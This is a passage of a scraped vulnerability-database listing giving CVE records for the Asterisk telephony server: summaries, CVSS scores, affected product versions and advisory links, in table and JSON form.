      "value": "Asterisk Open Source versi\u00f3n 1.2.x anterior a 1.2.35, versi\u00f3n 1.4.x anterior a 1.4.26.3, versi\u00f3n 1.6.0.x anterior a 1.6.0.17 y versi\u00f3n 1.6.1.x anterior a 1.6.1.9; Business Edition versi\u00f3n A.x.x, versi\u00f3n B.x.x anteriores a B.2.5.12, versi\u00f3n C.2.x.x anterior a C.2.4.5 y versi\u00f3n C.3.x.x anterior a C.3.2.2; AsteriskNOW versi\u00f3n 1.5; y s800i versi\u00f3n 1.3.x anterior a 1.3.0.5, causan diferentes mensajes de error dependiendo de si un nombre de usuario SIP sea v\u00e1lido, lo que permite a los atacantes remotos enumerar nombres de usuario v\u00e1lidos mediante m\u00faltiples mensajes de REGISTER creados con nombres de usuario inconsistentes en el URI en el encabezado To y el Digest en el encabezado Authorization."
    }
  ],
  "id": "CVE-2009-3727",
  "lastModified": "2024-11-21T01:08:03.907",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "NONE",
          "baseScore": 5.0,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2009-11-10T18:30:00.250",
  "references": [
    {
      "source": "secalert@redhat.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2009-008.html"
    },
    {
      "source": "secalert@redhat.com",
      "url": "http://osvdb.org/59697"
    },
    {
      "source": "secalert@redhat.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/37265"
    },
    {
      "source": "secalert@redhat.com",
      "url": "http://secunia.com/advisories/37479"
    },
    {
      "source": "secalert@redhat.com",
      "url": "http://secunia.com/advisories/37677"
    },
    {
      "source": "secalert@redhat.com",
      "url": "http://www.debian.org/security/2009/dsa-1952"
    },
    {
      "source": "secalert@redhat.com",
      "tags": [
        "Patch"
      ],
      "url": "http://www.securityfocus.com/bid/36924"
    },
    {
      "source": "secalert@redhat.com",
      "url": "http://www.securitytracker.com/id?1023133"
    },
    {
      "source": "secalert@redhat.com",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=523277"
    },
    {
      "source": "secalert@redhat.com",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=533137"
    },
    {
      "source": "secalert@redhat.com",
      "url": "https://www.redhat.com/archives/fedora-package-announce/2009-November/msg00789.html"
    },
    {
      "source": "secalert@redhat.com",
      "url": "https://www.redhat.com/archives/fedora-package-announce/2009-November/msg00838.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2009-008.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://osvdb.org/59697"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/37265"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://secunia.com/advisories/37479"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://secunia.com/advisories/37677"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.debian.org/security/2009/dsa-1952"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "http://www.securityfocus.com/bid/36924"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securitytracker.com/id?1023133"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=523277"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=533137"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://www.redhat.com/archives/fedora-package-announce/2009-November/msg00789.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://www.redhat.com/archives/fedora-package-announce/2009-November/msg00838.html"
    }
  ],
  "sourceIdentifier": "secalert@redhat.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-200"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2019-05-23 19:29

Modified

2024-11-21 02:58

Severity ?

7.5 (High) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Summary

asterisk 13.10.0 is affected by: denial of service issues in asterisk. The impact is: cause a denial of service (remote).

References

▼	URL	Tags
	cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2016-006.html	Vendor Advisory
	af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2016-006.html	Vendor Advisory

Impacted products

	Vendor	Product	Version
	digium	asterisk	13.10.0

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.10.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "66595711-8573-4A9B-A8FE-4943E3097AA8",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "asterisk 13.10.0 is affected by: denial of service issues in asterisk. The impact is: cause a denial of service (remote)."
    },
    {
      "lang": "es",
      "value": "asterisk versi\u00f3n 13.10.0, se ve afectado por: problemas de Denegaci\u00f3n de Servicio en asterisk. El impacto es: provocar una Denegaci\u00f3n de Servicio (remota)."
    }
  ],
  "id": "CVE-2016-7550",
  "lastModified": "2024-11-21T02:58:11.820",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 5.0,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV30": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.0"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2019-05-23T19:29:00.243",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2016-006.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2016-006.html"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-476"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2006-08-24 20:04

Modified

2024-11-21 00:15

Severity ?

Summary

Asterisk 1.2.10 supports the use of client-controlled variables to determine filenames in the Record function, which allows remote attackers to (1) execute code via format string specifiers or (2) overwrite files via directory traversals involving unspecified vectors, as demonstrated by the CALLERIDNAME variable.

References

URL	Tags
cve@mitre.org	http://labs.musecurity.com/advisories/MU-200608-01.txt	Patch, Vendor Advisory
cve@mitre.org	http://secunia.com/advisories/22651
cve@mitre.org	http://securitytracker.com/id?1016742	Patch
cve@mitre.org	http://www.gentoo.org/security/en/glsa/glsa-200610-15.xml
cve@mitre.org	http://www.securityfocus.com/archive/1/444322/100/0/threaded
cve@mitre.org	http://www.securityfocus.com/bid/19683	Patch
cve@mitre.org	http://www.sineapps.com/news.php?rssid=1448
cve@mitre.org	http://www.vupen.com/english/advisories/2006/3372
cve@mitre.org	https://exchange.xforce.ibmcloud.com/vulnerabilities/28544
cve@mitre.org	https://exchange.xforce.ibmcloud.com/vulnerabilities/28564
af854a3a-2127-422b-91ae-364da2661108	http://labs.musecurity.com/advisories/MU-200608-01.txt	Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/22651
af854a3a-2127-422b-91ae-364da2661108	http://securitytracker.com/id?1016742	Patch
af854a3a-2127-422b-91ae-364da2661108	http://www.gentoo.org/security/en/glsa/glsa-200610-15.xml
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/archive/1/444322/100/0/threaded
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/19683	Patch
af854a3a-2127-422b-91ae-364da2661108	http://www.sineapps.com/news.php?rssid=1448
af854a3a-2127-422b-91ae-364da2661108	http://www.vupen.com/english/advisories/2006/3372
af854a3a-2127-422b-91ae-364da2661108	https://exchange.xforce.ibmcloud.com/vulnerabilities/28544
af854a3a-2127-422b-91ae-364da2661108	https://exchange.xforce.ibmcloud.com/vulnerabilities/28564

Impacted products

	Vendor	Product	Version
	digium	asterisk	1.2.10

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.10:*:*:*:*:*:*:*",
              "matchCriteriaId": "175954A5-E712-41B8-BC11-4F999343063D",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Asterisk 1.2.10 supports the use of client-controlled variables to determine filenames in the Record function, which allows remote attackers to (1) execute code via format string specifiers or (2) overwrite files via directory traversals involving unspecified vectors, as demonstrated by the CALLERIDNAME variable."
    },
    {
      "lang": "es",
      "value": "Asterisk 1.2.10 soporta el uso de variables controladas por cliente para determinar los nombres de archivo en la funci\u00f3n Record, lo que permite a atacantes remotos (1) ejecutar c\u00f3digo mediante especificadores de cadena de formato o (2) sobrescribir archivos mediante saltos de directorio relacionados con vectores no especificados, como se ha demostrado mediante la variable CALLERIDNAME."
    }
  ],
  "id": "CVE-2006-4346",
  "lastModified": "2024-11-21T00:15:44.300",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 7.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": true,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2006-08-24T20:04:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://labs.musecurity.com/advisories/MU-200608-01.txt"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://secunia.com/advisories/22651"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch"
      ],
      "url": "http://securitytracker.com/id?1016742"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.gentoo.org/security/en/glsa/glsa-200610-15.xml"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/archive/1/444322/100/0/threaded"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch"
      ],
      "url": "http://www.securityfocus.com/bid/19683"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.sineapps.com/news.php?rssid=1448"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.vupen.com/english/advisories/2006/3372"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/28544"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/28564"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://labs.musecurity.com/advisories/MU-200608-01.txt"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://secunia.com/advisories/22651"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "http://securitytracker.com/id?1016742"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.gentoo.org/security/en/glsa/glsa-200610-15.xml"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/archive/1/444322/100/0/threaded"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "http://www.securityfocus.com/bid/19683"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.sineapps.com/news.php?rssid=1448"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.vupen.com/english/advisories/2006/3372"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/28544"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/28564"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2007-11-30 01:46

Modified

2024-11-21 00:39

Severity ?

Summary

SQL injection vulnerability in the Postgres Realtime Engine (res_config_pgsql) in Asterisk 1.4.x before 1.4.15 and C.x before C.1.0-beta6 allows remote attackers to execute arbitrary SQL commands via unknown vectors.

References

URL	Tags
cve@mitre.org	http://downloads.digium.com/pub/security/AST-2007-025.html	Patch, Vendor Advisory
cve@mitre.org	http://osvdb.org/38933	Broken Link
cve@mitre.org	http://secunia.com/advisories/27873	Third Party Advisory
cve@mitre.org	http://securitytracker.com/id?1019021	Third Party Advisory, VDB Entry
cve@mitre.org	http://www.securityfocus.com/archive/1/484387/100/0/threaded	Third Party Advisory, VDB Entry
cve@mitre.org	http://www.securityfocus.com/bid/26645	Third Party Advisory, VDB Entry
cve@mitre.org	http://www.vupen.com/english/advisories/2007/4055	Third Party Advisory
cve@mitre.org	https://exchange.xforce.ibmcloud.com/vulnerabilities/38766	Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://downloads.digium.com/pub/security/AST-2007-025.html	Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://osvdb.org/38933	Broken Link
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/27873	Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	http://securitytracker.com/id?1019021	Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/archive/1/484387/100/0/threaded	Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/26645	Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://www.vupen.com/english/advisories/2007/4055	Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://exchange.xforce.ibmcloud.com/vulnerabilities/38766	Third Party Advisory, VDB Entry

Impacted products

Vendor	Product	Version
digium	asterisk	*
digium	asterisk	c.1.0
digium	asterisk	c.1.0
digium	asterisk	c.1.0
digium	asterisk	c.1.0
digium	asterisk	c.1.0

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "509EE4B3-B44A-446F-B1B5-476A8BE0F4D6",
              "versionEndExcluding": "1.4.15",
              "versionStartIncluding": "1.4.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.1.0:beta1:*:*:business:*:*:*",
              "matchCriteriaId": "5B85E573-3A3A-471F-906D-8A262315D0CC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.1.0:beta2:*:*:business:*:*:*",
              "matchCriteriaId": "65963B39-845B-47D9-A1BD-6ABBA160EF05",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.1.0:beta3:*:*:business:*:*:*",
              "matchCriteriaId": "4015BA36-F972-434D-8DA0-4ECE9992275A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.1.0:beta4:*:*:business:*:*:*",
              "matchCriteriaId": "587B6E6C-11C5-4721-B0F3-77E77B1C65A7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.1.0:beta5:*:*:business:*:*:*",
              "matchCriteriaId": "E4160773-6EA9-4339-9DD1-28D4EE591830",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "SQL injection vulnerability in the Postgres Realtime Engine (res_config_pgsql) in Asterisk 1.4.x before 1.4.15 and C.x before C.1.0-beta6 allows remote attackers to execute arbitrary SQL commands via unknown vectors."
    },
    {
      "lang": "es",
      "value": "Vulnerabilidad de inyecci\u00f3n SQL en Postgres Realtime Engine (res_config_pgsql) de Asterisk 1.4.x anterior a 1.4.15 y C.x before C.1.0-beta6 permite a atacantes remotos ejecutar comandos SQL de su elecci\u00f3n mediante vectores desconocidos."
    }
  ],
  "id": "CVE-2007-6171",
  "lastModified": "2024-11-21T00:39:31.050",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 7.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": true,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2007-11-30T01:46:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://downloads.digium.com/pub/security/AST-2007-025.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Broken Link"
      ],
      "url": "http://osvdb.org/38933"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "http://secunia.com/advisories/27873"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://securitytracker.com/id?1019021"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securityfocus.com/archive/1/484387/100/0/threaded"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securityfocus.com/bid/26645"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "http://www.vupen.com/english/advisories/2007/4055"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/38766"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://downloads.digium.com/pub/security/AST-2007-025.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Broken Link"
      ],
      "url": "http://osvdb.org/38933"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "http://secunia.com/advisories/27873"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://securitytracker.com/id?1019021"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securityfocus.com/archive/1/484387/100/0/threaded"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securityfocus.com/bid/26645"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "http://www.vupen.com/english/advisories/2007/4055"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/38766"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-89"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2023-12-14 20:15

Modified

2024-11-21 08:33

Severity ?

4.9 (Medium) - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Summary

Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, it is possible to read any arbitrary file even when the `live_dangerously` is not enabled. This allows arbitrary files to be read. Asterisk versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, contain a fix for this issue.

References

URL	Tags
security-advisories@github.com	https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757	Product
security-advisories@github.com	https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5	Patch
security-advisories@github.com	https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f	Vendor Advisory
security-advisories@github.com	https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html
af854a3a-2127-422b-91ae-364da2661108	https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757	Product
af854a3a-2127-422b-91ae-364da2661108	https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5	Patch
af854a3a-2127-422b-91ae-364da2661108	https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html

Impacted products

Vendor	Product	Version
digium	asterisk	*
digium	asterisk	*
digium	asterisk	21.0.0
sangoma	certified_asterisk	13.13.0
sangoma	certified_asterisk	13.13.0
sangoma	certified_asterisk	13.13.0
sangoma	certified_asterisk	13.13.0
sangoma	certified_asterisk	13.13.0
sangoma	certified_asterisk	13.13.0
sangoma	certified_asterisk	13.13.0
sangoma	certified_asterisk	13.13.0
sangoma	certified_asterisk	13.13.0
sangoma	certified_asterisk	13.13.0
sangoma	certified_asterisk	16.8.0
sangoma	certified_asterisk	16.8.0
sangoma	certified_asterisk	16.8.0
sangoma	certified_asterisk	16.8.0
sangoma	certified_asterisk	16.8.0
sangoma	certified_asterisk	16.8.0
sangoma	certified_asterisk	16.8.0
sangoma	certified_asterisk	16.8.0
sangoma	certified_asterisk	16.8.0
sangoma	certified_asterisk	16.8.0
sangoma	certified_asterisk	16.8.0
sangoma	certified_asterisk	16.8.0
sangoma	certified_asterisk	16.8.0
sangoma	certified_asterisk	18.9
sangoma	certified_asterisk	18.9
sangoma	certified_asterisk	18.9
sangoma	certified_asterisk	18.9
sangoma	certified_asterisk	18.9

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "A49E9157-3440-47C5-B730-B1F3BE7240C9",
              "versionEndExcluding": "18.20.1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "FCA06EB6-E31A-43B2-A750-186255114B8F",
              "versionEndExcluding": "20.5.1",
              "versionStartIncluding": "19.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:21.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "D3E690E3-3E92-42ED-87DD-1C6B838A3FF9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "2AFE2011-05AA-45A6-A561-65C6C664DA7B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "C1117AA4-CE6B-479B-9995-A9F71C430663",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc1:*:*:*:*:*:*",
              "matchCriteriaId": "775041BD-5C86-42B6-8B34-E1D5171B3D87",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc2:*:*:*:*:*:*",
              "matchCriteriaId": "55EC2877-2FF5-4777-B118-E764A94BCE56",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc3:*:*:*:*:*:*",
              "matchCriteriaId": "EB0392C9-A5E9-4D71-8B8D-63FB96E055A5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc4:*:*:*:*:*:*",
              "matchCriteriaId": "09AF962D-D4BB-40BA-B435-A59E4402931C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "559D1063-7F37-44F8-B5C6-94758B675FDF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert3:*:*:*:*:*:*",
              "matchCriteriaId": "185B2B4B-B246-4379-906B-9BDA7CDD4400",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "73D3592D-3CE5-4462-9FE8-4BCB54E74B5B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "B3CCE9E0-5DC4-43A2-96DB-9ABEA60EC157",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "1EAD713A-CBA2-40C3-9DE3-5366827F18C7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "A5F5A8B7-29C9-403C-9561-7B3E96F9FCA8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert10:*:*:*:*:*:*",
              "matchCriteriaId": "F9B96A53-2263-463C-9CCA-0F29865FE500",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert11:*:*:*:*:*:*",
              "matchCriteriaId": "A53049F1-8551-453E-834A-68826A7AA959",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert12:*:*:*:*:*:*",
              "matchCriteriaId": "B224A4E9-4B6B-4187-B0D6-E4BAE2637960",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "9501DBFF-516D-4F26-BBF6-1B453EE2A630",
              "vulnerable": true
            },
